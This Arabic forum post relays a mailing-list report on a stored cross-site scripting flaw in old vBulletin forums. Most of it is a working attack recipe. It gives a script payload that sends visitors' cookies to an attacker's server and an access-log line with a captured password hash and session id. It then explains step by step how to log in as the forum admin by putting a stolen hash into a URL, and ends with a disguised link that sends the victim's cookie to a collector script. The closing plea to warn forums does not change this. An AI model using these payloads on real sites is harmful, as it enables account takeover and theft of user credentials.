منذ فترة وصلني من خلال Mailing Lists لموقع securityfocus.com موضوع هام حول أمن المنتديات و سرقة كوكي الادمن من منتديات vBulletin عن طريق كود خدعة مثل وضع كود صورة او توقيع مثلا مع تضمنه لسيكربت يسرق الكوكي ممن يفتحه ........ وهذا بعض من نص الرسالة ...
------------ The Exploit: ------------
It involves a few different parts,
firstly some malicious scripting and then tricking the
forum into accepting data from the wrong place. First,
I post some malicious html in a reply to a topic that allows HTML:
<script>document.write(''+document.cookie+'">';When someone loads the page, the javascript echoes the contents of their cookies into the image source tag that points to a webserver on my machine, resulting in this kind of line in my access log:
GET /bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fbddf90622;%20sessionhash=a 4719cd620534914930b86839c4bb5f8;%20bbthreadview[5420]=1012444064;%20bblastvi sit=1011983161
طبعا هذا الكود للاختبار ...ولكن صناعة كود لسرقة الكوكي سهل جدا ...
وهذه الثغرة تعمل على جميع الاصدارات قبل 2.2.1 وأعتقد انه تم تعديلها في الاصدار الذي يلي وهو 2.2.2
المهم ان الموقع انتهى الى حل وهو انه يجب الغاء السماح لجميع أكواد HTML و VB Code الى ان أصدر ترقية للنسخة ...
شركة vBulletin بدأت تستخدم خاصية تشفير الباسوورد بدءا من الاصدار 2.0.0 وما بعده ... وهو على ما اعتقد تشفير بمقياس MD5 ... ولكن تشفير الكوكي هو نفس التشفير في SQL المنتدى ...
إليكم بعض التجارب .... افتح الكوكي الخاص بالمنتدى ... ستجد فيه كالتالي :
bblastvisit 1013555716 www.server.com/ 1536258608998429545196108049068829398447*bbuserid1141 www.server.com/ 1536357608998429545196207312068829398447*bbpassword 3ba2edb61d6a3268cf9327b02f5ac3ec www.server.com/1536357608998429545196207312068829398447*
الآن كلمة السر المشفرة هي ...
3ba2edb61d6a3268cf9327b02f5ac3ec
اي بين كلمتي bbpassword و www.server.com ...
وهي نفسها الموجودة في SQL ...
الآن قم بالخروج من المنتدى وهنا ستأتيك رسالة انه تم مسح الكوكي انتقل بعدها الى الصفحة الرئيسية للمنتدى ثم اكتب التالي بعد عنوان المنتدى ..
http://www.server.com/vb/index.php?s=&bbpa...WORD&bbuserid=1
مع تغيير PASSWORD بالباسوورد المشفرة التي وجدتها بالكوكي ... وكذلك الرقم الاخير ( 1 ) وهو عادة يكون للأدمن ... برقمك الشخصي بالمنتدى ...!!!
طريقة الدخول هذه تجدها في ملف member.php ضمن ملفات المنتدى ....
بالنسبة للسكربت الذي يسرق الكوكي فهذا مثال له :
[a
href="about://www.server.com/[script]window.open("http://www.yourwebsite
.com/cook.php?"+document.cookie);[/script]"]Hey,this is the last Bind9
remote root exploit ![/a]
(replace [ & ] by < & >)
www.server.com is the site that you want to get cookie.
www.yourwebsute.com is the site that will recieve the cookie thru the
cook.php script.ويمكن استخدامها أيضا في مجلات PhpNuke لما قبل الاصدار 5.4 .. ولم أجربه على هذا الاصدار ....
اذا وجدتم منتديات فيها هذه الثغرة فأرجو ان تحذروهم منها لا ان تخترقوهم ...!!!!
لكم تحياتي ....(f) (f)